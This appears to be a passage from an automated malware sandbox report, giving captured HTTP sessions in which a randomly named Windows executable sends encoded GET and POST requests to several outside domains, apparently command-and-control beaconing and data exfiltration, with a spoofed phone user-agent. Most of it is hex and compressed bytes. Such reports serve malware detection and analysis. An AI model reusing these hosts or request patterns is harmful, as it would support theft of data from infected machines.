71 78 4f 30 49 36 5a 52 49 6e 76 75 78 44 6c 6d 50 62 41 31 33 69 4e 46 35 35 48 6c 7a 65 66 55 4f 64 31 4d 6e 6d 74 2f 5a 57 30 59 6f 79 4d 79 62 67 7a 54 68 63 6e 4a 66 55 77 4c 57 54 32 4f 6c 56 6b 4a 41 37 50 74 6c 7a 54 2f 6b 6a 75 65 76 4a 62 6d 33 68 36 37 54 33 47 30 4c 70 34 70 61 72 73 6d 77 4b 4f 41 50 2b 74 [TRUNCATED] Data Ascii: ZXzt1jdX=ZS7+/kH4l4u6GF1/hA/LlfKbrPogcofd+venJt0No9yJRtIvbL8HlB7QkRPlhxuoFySjOhUeXv2W1R6lGy7LggUNTwyQtEl9veJE0YVb/UPAhSEOSmhSVP5Y0a+jis70tTxti5uP9ikenYVFxinwOKMgUzjIxp09livyk/YvqEBAtMjeez5ASCvAL6fLY26IhztvZ3W4OIQC+t9GblgWcfg32FpFBLqxO0I6ZRInvuxDlmPbA13iNF55HlzefUOd1Mnmt/ZW0YoyMybgzThcnJfUwLWT2OlVkJA7PtlzT/kjuevJbm3h67T3G0Lp4parsmwKOAP+tBbg6YXW6k/3XDxUljXdxaHYLezBifxc1bbDsfhUpgXCzJeLduAuLRzytwWYE/vlI4L9a8YMSOGw6vh+PteJwNFTMzbrGc34GmlBx7RC9D/a5XYFwBuEP8NJRZpURU6c5qBpG7/ojIGzbV3RmzLIehK0Y2gknr2XzPa5Ng0u7EeCXj4d7tuBNE+MiInnDn1n3tXs4DGqUD+OWZRU+Q20foMOi5tED+z1x52innIja6XB2kIvr8YiHxX6SRK727sn6iy7tk2ChlJUMrJD0V09WsBJaO4qNCTVehpas06276/JVgdMncq8hCN2/DQ+PbK04P0xm2xLs6fdvWgY8/VaiHv+62JumOuqASkkd3ErBbaZ94aBcSTDSGjG+G0zSjggBkHHhSxfETirtefHZSTy9f8ekk9fWhH0KmMRAtIpyAM2dnmBA9TkR4ga2gkhYX5sYTe+HQuXLqmn0CtXCNxHWMQ+q+F4LdJf2vHu3UO6BpZ3jviEvB0B+8APEdr/Htr3FznSjC2gm1BG5jvKOPpHctqpHtDcXcjq/zxDN1MfV+LXegi3WHpe0TSPTWUHhhU6yg5Q2k1anTCTqFDxUkiK33+B26xeryzRxpeJnuZ2Xg9rwWzKAm5Po+FP0cwZW7rmHlD9yfK5f3JdZn0kO65nCkSEXA6Iv2Yr/Uv [TRUNCATED]
Aug 31, 2024 14:06:22.638361931 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Sat, 31 Aug 2024 12:17:04 GMT Server: Apache Upgrade: h2 Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 12974 Content-Type: text/html; charset=utf-8 Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd bd 79 97 e3 d8 75 27 f8 f7 e8 53 60 d2 b2 33 4b ce 4c 2c 04 41 b0 2a ab 3c d8 17 82 00 89 85 04 69 69 f2 60 07 88 95 d8 49 59 e7 d8 33 dd b6 7a 46 b2 ac b6 c7 2d cd d8 e3 96 7d 8e a5 63 4f 4b 3d bd d8 6a db f2 7c 99 ca aa d2 5f f3 15 06 8c c8 c8 8c 8c 60 64 a5 52 76 56 f7 20 4f 46 10 0f ef dd f7 bb f7 dd f5 05 08 3c f9 ef 69 85 d2 37 0b 06 08 eb 34 f9 e8 4b 4f ae 7e 79 96 fb d1 97 80 e1 78 92 7a b5 05 38 a1 55 56 5e fd e1 3d 43 67 1f e1 f7 9e 5f aa a3 3a f1 3e fa f4 3f fe fd a7 7f ff 67 cf be f3 dd 4f ff e8 cf 7e fe 47 df ff ec 27 3f 79 02 5e 5e b9 46 20 b3 52 ef c3 7b 65 6e e7 75 75 0f 70 f2 ac f6 b2 81 5c 96 47 99 eb f5 0f b3 dc cf 93 24 ef ee 01 e0 f3 51 55 7d b8 a2 70 3a c0 af 00 a4 55 79 c0 57 c0 17 4d 76 ee 1e 80 af bf 38 3d 1d 4e 9e e4 e5 fb c0 af 8c 46 a3 0f 5e b9 e0 0f 13 be 0f c0 58 d1 03 2b af 74 ad cc 7a 08 dc e3 bd a4 f5 ea c8 b1 00 d9 6b bc 7b 0f 81 f0 aa e1 21 40 94 91 95 3c 04 ee cf 23 a7 cc ab dc af 81 8d c5 7b d1 fd 87 40 65 65 d5 a3 ca 2b 23 ff d5 [TRUNCATED] Data Ascii: yu'S`3KL,A<ii`IY3zF-}cOK=j\|_`dRvV OF<i74KO~yxz8UV^=Cg_:>?gO~G'?y^^F R{enuup\G$QU}p:UyWMv8=NF^X+tzk{!@<#{@ee+#)R}z\7@a=S,94I:z~142Qr^(${aW>@~/rVz^+Z;OssY]_SV'VJ9yiQ>j{(Ok~.}q~qk<K0o\$_(W2A\|>}}K@mw@Eys'n!XM!W_c]ct>ZrwNoZ_ZnTNJ>@`V58:)5yneIpW>,}:)aMmdBcs?N{v%dM}U;%\|>J<~k:y^5nkF\E{'??vr#8$qWxa@{{U0V5Hz{3zKwO+HO&\|>:kP(;}_?_X5_=jP<\^
Aug 31, 2024 14:06:22.638386011 CEST	224	IN	Data Raw: 87 91 73 32 85 37 b5 92 b3 fa 77 61 ba 83 8e e1 9f ef a1 6e 8a 35 89 be 7e 4e 6d 2f 09 be ce 2d dd ed 6e 5e e3 8d de 0c d3 6d 1d bf 33 d9 7e 31 cd ad c5 7a 83 c5 be 8b d7 57 dc c0 1b 2f ea 3f 89 a7 3b 27 9e ba 1c 82 e5 2f 6b f3 67 f8 be 88 6a 9f Data Ascii: s27wan5~Nm/-n^m3~1zW/?;'/kgjN^i;snD^ugQa=kFA"+*!U4Ze )y}`\|ySGwCaGwx_8ERym
Aug 31, 2024 14:06:22.638394117 CEST	1236	IN	Data Raw: c9 75 3a ee aa 2f df 0c 25 50 a5 56 72 43 6d 5f 99 70 74 b3 9e 7d 93 78 75 99 a0 3c 77 61 d0 4d 86 ae fc a6 e3 38 6f 0c b7 3e 6d 76 9c 81 f9 5c 68 6f 58 09 dc 6d f6 bf 88 b9 5f 87 e5 de 61 ac d0 6d 27 38 64 2c a7 ad 95 e4 4a 0d 06 4f 77 46 03 2f Data Ascii: u:/%PVrCm_pt}xu<waM8o>mv\hoXm_am'8d,JOwF/oX2huy/Z]#iuA.Kn9W;w\-/jju8ZloHHki='(~\|k"A)SU]^
Aug 31, 2024 14:06:22.638451099 CEST	224	IN	Data Raw: a5 41 7c 40 76 36 83 b9 09 ff 56 27 ab 06 ce 24 36 17 48 be 7a 85 e4 ab 97 b3 5e cd fe 3c 9f 79 f4 d1 85 e7 7c ef 5d e6 35 46 99 bc e4 1d 19 5c cf 8d 86 93 30 6e b1 fd cf 2c 9c 01 c2 05 8e 77 29 16 a2 28 5e b2 8d 42 83 62 dc 6c 79 27 92 18 26 bd Data Ascii: A\|@v6V'$6Hz^<y\|]5F\0n,w)(^Bbly'&eSq^4v9>xp17rx:sei99&k2.w${?w}\|#'yiQdp{d;&y\|3=_Vz;kykp
Aug 31, 2024 14:06:22.638459921 CEST	1236	IN	Data Raw: dd bb 7b dd 39 c7 56 9b 00 60 cc a3 09 da 60 1c 0b 83 21 01 4a 89 3f b3 cb 45 1e 38 b9 ef 02 ad 97 89 35 24 e7 d3 83 a8 d6 42 6b 4b 38 9f 90 93 65 ac 2e 92 b0 6f 72 f6 a0 ed 94 d0 f0 cc 16 59 c3 2a 96 70 87 89 14 04 86 ac 77 87 65 cd 24 d3 d6 13 Data Ascii: {9V``!J?E85$BkK8e.orY*pwe$hAcAhid@YL6+N&Q{MgH<8&4%$6&",)rv?!lW B6=G\|r\|Cqyvm`G=t27:i#JEbkE
Aug 31, 2024 14:06:22.638468981 CEST	224	IN	Data Raw: 53 a2 1c b5 d6 67 ba 3c 55 db b5 5e 38 7b 8f 86 a3 74 dc 88 41 07 88 23 4d 29 90 51 01 b2 26 54 25 f8 b1 19 2c 2c 34 35 23 77 14 95 35 47 dd a6 72 6b b8 86 3a ad c8 77 1e 4d 1c 35 76 aa 4f 64 73 71 9c 0a 66 21 48 f8 de 29 c4 65 87 f4 b1 e1 c5 49 Data Ascii: Sg<U^8{tA#M)Q&T%,,45#w5Grk:wM5vOdsqf!H)eIkr,-'vfI"h;0Pv=r+I.XT+tSB=5mB;Fb<wdPk$<#fn5/73!c6r5`\|iZqo=B
Aug 31, 2024 14:06:22.638536930 CEST	1236	IN	Data Raw: 2c dc 70 15 82 ae c7 42 6c a8 fd fe a8 32 2e 3d 8b 5b 8d 6d 24 ab 24 86 a5 13 d2 d1 7a 3a c2 72 6f ab 32 73 79 e7 ec 95 64 ad 8c 77 ec 0c c0 a7 31 26 2f a1 3a 5e cd 44 d7 c2 ad e5 8e 2d 20 64 5e ee f9 32 c2 64 37 f0 c7 5b bf 71 a9 30 d6 54 9a 9b Data Ascii: ,pBl2.=[m$$z:ro2sydw1&/:^D- d^2d7[q0TAj SxZkr6ZVu\Fq/L;J1<'ul-r_61wffj^Z{1=^ RgSQU<#XP,M:eavFsP6[i
Aug 31, 2024 14:06:22.638577938 CEST	224	IN	Data Raw: 8d 65 40 62 21 75 11 51 ac 3b c5 b4 a3 b1 b7 07 ab 31 3d 74 d5 43 f1 4c cc 51 24 13 72 cd 9f b0 c7 88 5b 8f 55 c3 a5 a4 3c ec a1 0a 67 0a 0a 05 74 5b e4 cc 18 cf 4b cf 51 0b bb 19 af 0f 92 1f 37 07 f9 c8 b3 07 c3 da ee 8e 28 d4 76 9b 95 bf 5c 27 Data Ascii: e@b!uQ;1=tCLQ$r[U<gt[KQ7(v\'CCDC2#dH%Yq$qmZGQ_A"6<8rxpD5h0%@-wtRMd:L:OHu
Aug 31, 2024 14:06:22.638614893 CEST	1236	IN	Data Raw: d9 8d e3 79 8c 6d 2c 85 ec 77 54 89 da ab 9d 1d 8a 63 91 dc 8d 5d 67 be da 6f 46 89 dc ed 82 79 90 6c d5 5c 26 ec 54 64 b8 6c 04 b3 6b 10 0b 25 2a 0f d8 78 44 7b 66 40 b0 f3 e5 61 8c aa 76 a9 21 a1 a5 c4 76 d2 37 75 48 6a 72 12 c8 a9 ec ac 87 a4 Data Ascii: ym,wTc]goFyl\&Tdlk%*xD{f@av!v7uHjr8aq.KFC>,A:iL..7w&F>J)e9<SaHvYmP+?Z @hW\|jAd]CSwYIf,jfuJbx0iX6f
Aug 31, 2024 14:06:22.638725042 CEST	224	IN	Data Raw: 78 a3 c3 d3 a3 bf ee 96 b3 06 55 8e c4 74 dd fb 2b 1a 9e a2 a1 0a 59 90 12 67 e0 11 20 8a 40 1e 2c ba cf 74 70 e3 76 56 b6 02 f7 a3 22 c7 b9 21 8a 0e f9 01 a7 62 ec 34 43 eb de 73 5a 73 28 c0 25 4a 96 33 98 71 b4 04 d6 82 79 51 0f b1 69 b5 9c 1b Data Ascii: xUt+Yg @,tpvV"!b4CsZs(%J3qyQizY5uMp[om{J7B:=nBi2,SN`>\4>$c{Wu3sbrE#2mW'#Crf9clF>ghAjuT!%:W^IK
Aug 31, 2024 14:06:22.643871069 CEST	1236	IN	Data Raw: 7f 65 64 29 5d c7 e6 0e ae 0b 45 59 d0 66 80 db f1 64 10 63 27 4c 4a 2d 45 96 6b 19 15 77 5e 5c c5 39 3b 62 39 d9 3c 4c f4 d2 0e 0c d3 f3 c3 6c 79 d8 c9 f6 16 5c 90 1c b3 8f 3d 70 69 aa 82 58 03 7c a2 11 b1 b8 07 b3 29 1e 2c d2 f5 02 64 5c 84 01 Data Ascii: ed)]EYfdc'LJ-Ekw^\9;b9<Lly\=piX\|),d\E?@[s1A(_o{bU mFrNvuqTYo6x?logY# [~^{t\n&6X88U9+m#/3_\|TxL/CxSU

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	58133	154.23.176.197	80	3004	C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 14:06:24.058834076 CEST	426	OUT	GET /qer4/?ZXzt1jdX=UQTe8T+Iiqz9DT0FlyqPvcGPqOgPe8+u3s7KU5oKxN2bJ9UfIOk7myDXpD+ZujeoMjeiGDcwHIyYgzCoICrrm0QdeA2m/FQRgN8WzYZXzVLDjgJaJykIP/c=&fVU8=HRzx HTTP/1.1 Host: www.shipincheshi.skin Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Aug 31, 2024 14:06:24.994774103 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Sat, 31 Aug 2024 12:17:06 GMT Server: Apache Upgrade: h2 Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e e7 b3 bb e7 bb 9f e5 8f 91 e7 94 9f e9 94 99 e8 af af 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2f 2a 20 42 61 73 65 20 2a 2f 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 31 36 70 78 20 56 65 72 64 61 6e 61 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 68 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 27 4d 69 63 72 6f 73 6f 66 74 20 59 61 48 65 69 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d [TRUNCATED] Data Ascii: 2000<!DOCTYPE html><html><head> <meta charset="UTF-8"> <title></title> <meta name="robots" content="noindex,nofollow" /> <style> /* Base */ body { color: #333; font: 16px Verdana, "Helvetica Neue", helvetica, Arial, 'Microsoft YaHei', sans-serif; margin: 0; padding: 0 20px 20px; } h1{ margin: 10px 0 0; font-size: 28px; font-weight: 500; line-height: 32px; } h2{ color: #4288ce; font-weight: 400; padding: 6px 0; margin: 6px 0 0; font-size: 18px; border-bottom: 1px solid #eee; } h3{ margin: 12px; font-size: 16px; font-weight: bold; } abbr{ cursor: help; text-decoration: underline; text-decoration-style: dotted; } a{ color [TRUNCATED]
Aug 31, 2024 14:06:24.994792938 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a Data Ascii: cursor: pointer; } a:hover{ text-decoration: underline; } .line-error{ background: #f8cbcb; } .echo table { width: 100%; } .echo pr
Aug 31, 2024 14:06:24.994810104 CEST	448	IN	Data Raw: 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 36 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 39 39 39 3b 0a Data Ascii: padding: 16px; border-radius: 4px; background: #999; } .exception .source-code{ padding: 6px; border: 1px solid #ddd; background: #f9f9f9; overflow-x
Aug 31, 2024 14:06:24.994993925 CEST	1236	IN	Data Raw: 6e 65 2d 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 Data Ascii: ne-block; min-width: 100%; box-sizing: border-box; font-size:14px; font-family: "Century Gothic",Consolas,"Liberation Mono",Courier,Verdana; padding-left: 48px; } .excepti
Aug 31, 2024 14:06:24.995009899 CEST	1236	IN	Data Raw: 20 2a 2f 0a 20 20 20 20 20 20 20 20 2e 65 78 63 65 70 74 69 6f 6e 2d 76 61 72 20 74 61 62 6c 65 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 32 70 Data Ascii: */ .exception-var table{ width: 100%; margin: 12px 0; box-sizing: border-box; table-layout:fixed; word-wrap:break-word; } .exception-var table cap
Aug 31, 2024 14:06:24.995021105 CEST	448	IN	Data Raw: 6e 74 73 20 77 69 74 68 20 74 68 65 20 63 6c 61 73 73 65 73 20 62 65 6c 6f 77 20 61 72 65 20 61 64 64 65 64 20 62 79 20 70 72 65 74 74 79 70 72 69 6e 74 2e 20 2a 2f 0a 20 20 20 20 20 20 20 20 70 72 65 2e 70 72 65 74 74 79 70 72 69 6e 74 20 2e 70 Data Ascii: nts with the classes below are added by prettyprint. / pre.prettyprint .pln { color: #000 } / plain text / pre.prettyprint .str { color: #080 } / string content / pre.prettyprint .kwd { color: #008 } / a keywor
Aug 31, 2024 14:06:24.995039940 CEST	1236	IN	Data Raw: 20 20 2f 2a 20 70 75 6e 63 74 75 61 74 69 6f 6e 2c 20 6c 69 73 70 20 6f 70 65 6e 20 62 72 61 63 6b 65 74 2c 20 6c 69 73 70 20 63 6c 6f 73 65 20 62 72 61 63 6b 65 74 20 2a 2f 0a 20 20 20 20 20 20 20 20 70 72 65 2e 70 72 65 74 74 79 70 72 69 6e 74 Data Ascii: /* punctuation, lisp open bracket, lisp close bracket / pre.prettyprint .pun, pre.prettyprint .opn, pre.prettyprint .clo { color: #660 } pre.prettyprint .tag { color: #008 } / a markup tag name */ pre.prettyprint .
Aug 31, 2024 14:06:24.995050907 CEST	224	IN	Data Raw: 20 20 20 20 20 20 20 24 61 76 61 69 6c 61 62 6c 65 20 3d 20 74 72 75 65 3b 0a 3c 2f 63 6f 64 65 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 6c 69 6e 65 2d 35 34 22 3e 3c 63 6f 64 65 3e 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 63 6f Data Ascii: $available = true;</code></li><li class="line-54"><code> }</code></li><li class="line-55"><code></code></li><li class="line-56"><code> // </code></li><li class="line-57"><code>
Aug 31, 2024 14:06:24.995059013 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 24 6d 6f 64 75 6c 65 20 26 61 6d 70 3b 26 61 6d 70 3b 20 24 61 76 61 69 6c 61 62 6c 65 29 20 7b 0a 3c 2f 63 6f 64 65 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 6c 69 6e 65 2d 35 38 22 3e 3c Data Ascii: if ($module && $available) {</code></li><li class="line-58"><code> // </code></li><li class="line-59"><code> $this->request->setModule($module);</code></li><li class="li
Aug 31, 2024 14:06:24.995069027 CEST	224	IN	Data Raw: 65 3e 3c 2f 6c 69 3e 3c 2f 6f 6c 3e 3c 2f 70 72 65 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 09 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 72 61 63 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 43 61 6c Data Ascii: e></li></ol></pre> </div> <div class="trace"> <h2>Call Stack</h2> <ol> <li>in <a class="toggle" title="/www/wwwroot/jianche.zhongzhuankk144.sbs/thinkphp/library/think/
Aug 31, 2024 14:06:24.999836922 CEST	1236	IN	Data Raw: 72 6f 75 74 65 2f 64 69 73 70 61 74 63 68 2f 4d 6f 64 75 6c 65 2e 70 68 70 20 6c 69 6e 65 20 36 32 22 3e 4d 6f 64 75 6c 65 2e 70 68 70 20 6c 69 6e 65 20 36 32 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: route/dispatch/Module.php line 62">Module.php line 62</a></li> <li> at <abbr title="think\route\dispatch\Module">Module</abbr>->init() in <a class="toggle" title="/www/wwwroot/jianche.zhongzhuank

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	58134	3.33.130.190	80	3004	C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 14:06:30.369291067 CEST	721	OUT	POST /byvv/ HTTP/1.1 Host: www.ablackwomansmarch.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 205 Cache-Control: no-cache Origin: http://www.ablackwomansmarch.info Referer: http://www.ablackwomansmarch.info/byvv/ User-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 Data Raw: 5a 58 7a 74 31 6a 64 58 3d 67 47 55 34 63 4d 6e 38 2b 31 31 67 42 33 4d 5a 5a 63 30 78 77 54 2f 31 61 62 68 45 52 73 52 5a 34 47 50 74 4d 5a 38 2f 68 42 35 50 72 44 6f 54 45 4d 5a 50 2f 4a 5a 34 46 47 69 46 69 78 42 6b 6c 5a 45 77 65 41 57 4f 50 58 64 64 2f 44 71 30 46 59 44 6f 68 4d 5a 52 50 7a 64 70 75 37 4e 70 7a 52 4c 52 65 51 34 75 74 4a 36 64 76 73 62 4e 57 75 42 59 66 51 6c 72 67 74 5a 74 74 4a 2f 31 6e 51 63 54 6e 37 47 77 65 59 43 37 72 39 46 41 7a 6b 43 49 51 4a 71 56 6c 72 5a 54 30 2b 68 57 68 6e 41 66 67 36 71 33 58 70 38 4e 76 32 51 61 64 33 53 32 2b 66 55 6c 4c 30 68 73 49 77 6e 4a 4b 67 3d 3d Data Ascii: ZXzt1jdX=gGU4cMn8+11gB3MZZc0xwT/1abhERsRZ4GPtMZ8/hB5PrDoTEMZP/JZ4FGiFixBklZEweAWOPXdd/Dq0FYDohMZRPzdpu7NpzRLReQ4utJ6dvsbNWuBYfQlrgtZttJ/1nQcTn7GweYC7r9FAzkCIQJqVlrZT0+hWhnAfg6q3Xp8Nv2Qad3S2+fUlL0hsIwnJKg==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	58135	3.33.130.190	80	3004	C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 14:06:32.942600012 CEST	741	OUT	POST /byvv/ HTTP/1.1 Host: www.ablackwomansmarch.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 225 Cache-Control: no-cache Origin: http://www.ablackwomansmarch.info Referer: http://www.ablackwomansmarch.info/byvv/ User-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 Data Raw: 5a 58 7a 74 31 6a 64 58 3d 67 47 55 34 63 4d 6e 38 2b 31 31 67 41 58 51 5a 4a 50 63 78 35 54 2f 36 56 37 68 45 4b 63 52 46 34 47 7a 74 4d 59 4a 30 69 7a 64 50 72 6d 55 54 44 39 5a 50 38 4a 5a 34 4f 6d 69 41 73 52 42 76 6c 5a 49 4f 65 42 61 4f 50 54 31 64 2f 44 36 30 45 72 72 6e 6a 63 5a 54 45 54 64 76 74 4c 4e 70 7a 52 4c 52 65 51 39 4c 74 4a 53 64 76 5a 54 4e 57 4e 5a 62 58 77 6c 6f 6f 4e 5a 74 37 35 2f 78 6e 51 64 30 6e 2b 69 61 65 64 65 37 72 38 31 41 7a 32 71 4c 4c 35 71 58 68 72 59 54 6b 63 51 78 6d 56 31 72 72 63 2b 72 56 6f 49 77 75 77 42 41 4d 47 7a 68 73 66 77 57 57 7a 6f 59 46 7a 61 41 52 73 58 76 4e 6e 39 63 51 47 68 51 57 4d 4d 6d 58 51 57 67 7a 43 55 3d Data Ascii: ZXzt1jdX=gGU4cMn8+11gAXQZJPcx5T/6V7hEKcRF4GztMYJ0izdPrmUTD9ZP8JZ4OmiAsRBvlZIOeBaOPT1d/D60ErrnjcZTETdvtLNpzRLReQ9LtJSdvZTNWNZbXwlooNZt75/xnQd0n+iaede7r81Az2qLL5qXhrYTkcQxmV1rrc+rVoIwuwBAMGzhsfwWWzoYFzaARsXvNn9cQGhQWMMmXQWgzCU=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	58136	3.33.130.190	80	3004	C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 14:06:35.614917994 CEST	10823	OUT	POST /byvv/ HTTP/1.1 Host: www.ablackwomansmarch.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 10305 Cache-Control: no-cache Origin: http://www.ablackwomansmarch.info Referer: http://www.ablackwomansmarch.info/byvv/ User-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 Data Raw: 5a 58 7a 74 31 6a 64 58 3d 67 47 55 34 63 4d 6e 38 2b 31 31 67 41 58 51 5a 4a 50 63 78 35 54 2f 36 56 37 68 45 4b 63 52 46 34 47 7a 74 4d 59 4a 30 69 7a 56 50 72 30 4d 54 45 75 42 50 39 4a 5a 34 44 47 69 42 73 52 42 49 6c 5a 67 4b 65 42 47 6b 50 52 39 64 2f 68 43 30 44 61 72 6e 71 63 5a 54 4c 7a 64 75 75 37 4d 78 7a 52 37 4e 65 52 4e 4c 74 4a 53 64 76 65 6a 4e 52 65 42 62 52 77 6c 72 67 74 5a 68 74 4a 2f 56 6e 52 34 4c 6e 2b 6e 74 65 75 47 37 71 66 64 41 32 46 43 4c 48 35 71 4a 6d 72 59 39 6b 63 63 75 6d 56 70 52 72 63 69 52 56 6f 38 77 74 57 59 4b 65 45 72 2f 2b 39 63 4d 4b 68 59 47 49 79 2b 51 4a 62 62 42 4c 6e 64 69 4c 55 35 75 64 4e 70 42 41 78 47 45 76 47 78 57 30 4d 38 34 75 33 58 4a 38 51 6f 2b 69 59 69 61 34 35 4c 2b 6f 52 56 31 63 69 7a 69 4d 35 49 44 39 71 44 58 35 32 59 41 6a 34 45 42 58 54 7a 4c 35 71 38 59 36 48 68 71 74 6f 55 4a 44 4d 42 30 42 68 4b 4e 4f 54 38 36 74 35 33 2b 4d 74 31 30 37 72 43 76 39 4b 43 59 41 44 5a 58 6c 34 74 49 76 77 41 2f 4d 7a 44 71 54 6f 35 5a 4a 2f 42 4b 2f [TRUNCATED] Data Ascii: ZXzt1jdX=gGU4cMn8+11gAXQZJPcx5T/6V7hEKcRF4GztMYJ0izVPr0MTEuBP9JZ4DGiBsRBIlZgKeBGkPR9d/hC0DarnqcZTLzduu7MxzR7NeRNLtJSdvejNReBbRwlrgtZhtJ/VnR4Ln+nteuG7qfdA2FCLH5qJmrY9kccumVpRrciRVo8wtWYKeEr/+9cMKhYGIy+QJbbBLndiLU5udNpBAxGEvGxW0M84u3XJ8Qo+iYia45L+oRV1ciziM5ID9qDX52YAj4EBXTzL5q8Y6HhqtoUJDMB0BhKNOT86t53+Mt107rCv9KCYADZXl4tIvwA/MzDqTo5ZJ/BK/St9gTGygqnCk7RCPwkVOAHTXM18osZ0JVVBwZZc5XQt0PEkF2URBmCqj2PdvRwx9HoMAyDs8KFgp9lKk+zCm8Q2k9CTnEd96j77JOAeLUSENKMuCMsNtXs8RAYp6JS2yBVXm1LmSbB3L9Ldz+5rtAcQYKN+Z0cJHNH0AXAJzxtFgXGotALR8qPiTeZciInYX1OIWXuFJ5FSe1HyfPMHU8APjuXAFLRCBHULTVfFzGTxfPAYQqWfpPHwMXPU7JNfHSZas9h5zRIKZ12Ho5JXEhHgZg5uerhI4BxqNWS0wq1WIAojX+sc7WTkiUuQTKBKlw86ZNuVa//aGvtDg/7rCwtfZf9tuhjCrGXwcRy5DUlzgoHY1i6MYJmeowkCmAzEsnDrrbx4foqpthBOfnrLXpNZ5L4+XcxauzuAIft0j7KNOYh/mg